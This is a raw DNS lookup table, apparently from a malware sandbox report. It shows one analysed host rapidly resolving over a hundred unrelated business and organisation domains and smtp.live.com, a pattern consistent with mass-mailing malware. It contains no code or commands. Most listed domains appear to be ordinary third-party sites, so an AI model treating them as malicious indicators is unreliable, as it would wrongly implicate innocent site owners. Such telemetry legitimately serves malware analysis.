                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.412344933 CET8.8.8.8192.168.2.50x8aeeNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.428904057 CET8.8.8.8192.168.2.50xef43No error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.428904057 CET8.8.8.8192.168.2.50xef43No error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.439732075 CET8.8.8.8192.168.2.50x142fNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.439732075 CET8.8.8.8192.168.2.50x142fNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.447287083 CET8.8.8.8192.168.2.50xf6c1No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.453238964 CET8.8.8.8192.168.2.50x2b17Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.457048893 CET8.8.8.8192.168.2.50x183eNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.545429945 CET8.8.8.8192.168.2.50x3f5Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.545454979 CET8.8.8.8192.168.2.50xe62aNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.564601898 CET8.8.8.8192.168.2.50x7716No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.614752054 CET8.8.8.8192.168.2.50xe385No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.623106956 CET8.8.8.8192.168.2.50x66bcNo error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.623106956 CET8.8.8.8192.168.2.50x66bcNo error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.641053915 CET8.8.8.8192.168.2.50x6717Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.646928072 CET8.8.8.8192.168.2.50x2966No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.676110983 CET8.8.8.8192.168.2.50x906aServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.770668030 CET8.8.8.8192.168.2.50x4e25Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.773560047 CET8.8.8.8192.168.2.50x95f7No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.773560047 CET8.8.8.8192.168.2.50x95f7No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.773560047 CET8.8.8.8192.168.2.50x95f7No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.808018923 CET8.8.8.8192.168.2.50x6f50Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.854017019 CET8.8.8.8192.168.2.50xd4f9No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.870817900 CET8.8.8.8192.168.2.50xe95fNo error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.870817900 CET8.8.8.8192.168.2.50xe95fNo error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.889791965 CET8.8.8.8192.168.2.50x77ffNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.904026985 CET8.8.8.8192.168.2.50x9d59No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.924741030 CET8.8.8.8192.168.2.50xb606No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.011598110 CET8.8.8.8192.168.2.50xfb91No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.066351891 CET8.8.8.8192.168.2.50x7fe2Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.077991009 CET8.8.8.8192.168.2.50xd913No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.077991009 CET8.8.8.8192.168.2.50xd913No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.083720922 CET8.8.8.8192.168.2.50xee90No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.123351097 CET8.8.8.8192.168.2.50x1627Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.123711109 CET8.8.8.8192.168.2.50x82eaNo error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.124578953 CET8.8.8.8192.168.2.50x3700No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.138266087 CET8.8.8.8192.168.2.50xcb10No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.144637108 CET8.8.8.8192.168.2.50xefc7No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.186274052 CET8.8.8.8192.168.2.50x3d44No error (0)assideum.com52.219.177.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.188324928 CET8.8.8.8192.168.2.50xb65eNo error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.188324928 CET8.8.8.8192.168.2.50xb65eNo error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.188618898 CET8.8.8.8192.168.2.50x10c6No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.196799994 CET8.8.8.8192.168.2.50xfa73Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.198357105 CET8.8.8.8192.168.2.50xcd9No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.198357105 CET8.8.8.8192.168.2.50xcd9No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.269767046 CET8.8.8.8192.168.2.50xc685No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.273647070 CET8.8.8.8192.168.2.50xb2bNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.317724943 CET8.8.8.8192.168.2.50x6f6aNo error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.317724943 CET8.8.8.8192.168.2.50x6f6aNo error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.317724943 CET8.8.8.8192.168.2.50x6f6aNo error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.317724943 CET8.8.8.8192.168.2.50x6f6aNo error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.326764107 CET8.8.8.8192.168.2.50x57e6Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.327111959 CET8.8.8.8192.168.2.50x6c94No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.327156067 CET8.8.8.8192.168.2.50xd341No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.327256918 CET8.8.8.8192.168.2.50xe9c0No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.329433918 CET8.8.8.8192.168.2.50xc127No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.368773937 CET8.8.8.8192.168.2.50xd2dbName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.388315916 CET8.8.8.8192.168.2.50xdb16No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.396419048 CET8.8.8.8192.168.2.50xa31cName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.396759987 CET8.8.8.8192.168.2.50xf9d4No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.418189049 CET8.8.8.8192.168.2.50xfa8aNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.423835039 CET8.8.8.8192.168.2.50xcdb7No error (0)shiner.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.423835039 CET8.8.8.8192.168.2.50xcdb7No error (0)shiner.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.425614119 CET8.8.8.8192.168.2.50xc3a7Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.508843899 CET8.8.8.8192.168.2.50xb4fbNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.533068895 CET8.8.8.8192.168.2.50x2823No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.533068895 CET8.8.8.8192.168.2.50x2823No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.648710966 CET8.8.8.8192.168.2.50xf93bNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.721311092 CET8.8.8.8192.168.2.50x418eName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.776436090 CET8.8.8.8192.168.2.50xd0f4No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.787153006 CET8.8.8.8192.168.2.50xe6a7No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.841981888 CET8.8.8.8192.168.2.50x9dc8No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.884587049 CET8.8.8.8192.168.2.50x1507No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.956304073 CET8.8.8.8192.168.2.50x7aeeNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.956304073 CET8.8.8.8192.168.2.50x7aeeNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.048363924 CET8.8.8.8192.168.2.50x92baNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.048363924 CET8.8.8.8192.168.2.50x92baNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.157500029 CET8.8.8.8192.168.2.50xe7a2No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.157500029 CET8.8.8.8192.168.2.50xe7a2No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.169378996 CET8.8.8.8192.168.2.50x6970Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.171354055 CET8.8.8.8192.168.2.50xf90No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.171482086 CET8.8.8.8192.168.2.50x1d55No error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.171482086 CET8.8.8.8192.168.2.50x1d55No error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.178462982 CET8.8.8.8192.168.2.50x864aNo error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.191934109 CET8.8.8.8192.168.2.50xb5baNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.196249008 CET8.8.8.8192.168.2.50x4ee4No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.196249008 CET8.8.8.8192.168.2.50x4ee4No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.197325945 CET8.8.8.8192.168.2.50xd792No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.220766068 CET8.8.8.8192.168.2.50x34f8No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.220766068 CET8.8.8.8192.168.2.50x34f8No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.222791910 CET8.8.8.8192.168.2.50x6141No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.222791910 CET8.8.8.8192.168.2.50x6141No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.224334002 CET8.8.8.8192.168.2.50x6c9No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.224900961 CET8.8.8.8192.168.2.50x81faNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.236463070 CET8.8.8.8192.168.2.50x213bServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.249738932 CET8.8.8.8192.168.2.50x5207No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.249738932 CET8.8.8.8192.168.2.50x5207No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.249738932 CET8.8.8.8192.168.2.50x5207No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.254100084 CET8.8.8.8192.168.2.50xa9e3No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.274832010 CET8.8.8.8192.168.2.50x4e28No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.286135912 CET8.8.8.8192.168.2.50x5d9cNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.302753925 CET8.8.8.8192.168.2.50xc3e3Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.320673943 CET8.8.8.8192.168.2.50x9ecfNo error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.370562077 CET8.8.8.8192.168.2.50x4376No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.488706112 CET8.8.8.8192.168.2.50x5622No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.488706112 CET8.8.8.8192.168.2.50x5622No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.488955975 CET8.8.8.8192.168.2.50xa3cdNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.488955975 CET8.8.8.8192.168.2.50xa3cdNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.496525049 CET8.8.8.8192.168.2.50x71aNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.535424948 CET8.8.8.8192.168.2.50x163bNo error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.562864065 CET8.8.8.8192.168.2.50x7513No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.581350088 CET8.8.8.8192.168.2.50xfd9cNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.606863976 CET8.8.8.8192.168.2.50xf617No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.650571108 CET8.8.8.8192.168.2.50xdd93No error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.658473015 CET8.8.8.8192.168.2.50x6d87Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.708425045 CET8.8.8.8192.168.2.50x48dNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.713469982 CET8.8.8.8192.168.2.50x8562Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.731683969 CET8.8.8.8192.168.2.50xe848No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.770639896 CET8.8.8.8192.168.2.50x60acNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.815108061 CET8.8.8.8192.168.2.50xa650No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.817600012 CET8.8.8.8192.168.2.50xbbebNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.825037003 CET8.8.8.8192.168.2.50x3b59No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.826663971 CET8.8.8.8192.168.2.50xcc06No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:42.826663971 CET8.8.8.8192.168.2.50xcc06No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.026113987 CET8.8.8.8192.168.2.50xe43dNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.035043955 CET8.8.8.8192.168.2.50xc68aNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.035043955 CET8.8.8.8192.168.2.50xc68aNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.035322905 CET8.8.8.8192.168.2.50xab38No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.139920950 CET8.8.8.8192.168.2.50x959eNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.185693026 CET8.8.8.8192.168.2.50xab25No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.270047903 CET8.8.8.8192.168.2.50x4db6No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.270047903 CET8.8.8.8192.168.2.50x4db6No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.276599884 CET8.8.8.8192.168.2.50x229bNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.288238049 CET8.8.8.8192.168.2.50x6beeNo error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.300755978 CET8.8.8.8192.168.2.50x5575No error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.300755978 CET8.8.8.8192.168.2.50x5575No error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.340662956 CET8.8.8.8192.168.2.50x3adeNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.348421097 CET8.8.8.8192.168.2.50x5c9cNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.348421097 CET8.8.8.8192.168.2.50x5c9cNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.348421097 CET8.8.8.8192.168.2.50x5c9cNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.348421097 CET8.8.8.8192.168.2.50x5c9cNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.353837013 CET8.8.8.8192.168.2.50x18d0Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.359874010 CET8.8.8.8192.168.2.50xc980No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.367403030 CET8.8.8.8192.168.2.50xe204No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.367403030 CET8.8.8.8192.168.2.50xe204No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.380939007 CET8.8.8.8192.168.2.50x3692No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.412409067 CET8.8.8.8192.168.2.50x9ec1No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.485881090 CET8.8.8.8192.168.2.50xeb2dNo error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.485881090 CET8.8.8.8192.168.2.50xeb2dNo error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.486515999 CET8.8.8.8192.168.2.50x3448No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.488408089 CET8.8.8.8192.168.2.50xfc69No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.533684969 CET8.8.8.8192.168.2.50x9527No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.566668987 CET8.8.8.8192.168.2.50xc36eNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.575712919 CET8.8.8.8192.168.2.50x390No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.627840042 CET8.8.8.8192.168.2.50xf37bNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.667344093 CET8.8.8.8192.168.2.50x387aNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.756853104 CET8.8.8.8192.168.2.50x75c4No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:43.910114050 CET8.8.8.8192.168.2.50x114bName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.001806974 CET8.8.8.8192.168.2.50x55afNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.006526947 CET8.8.8.8192.168.2.50x891cNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
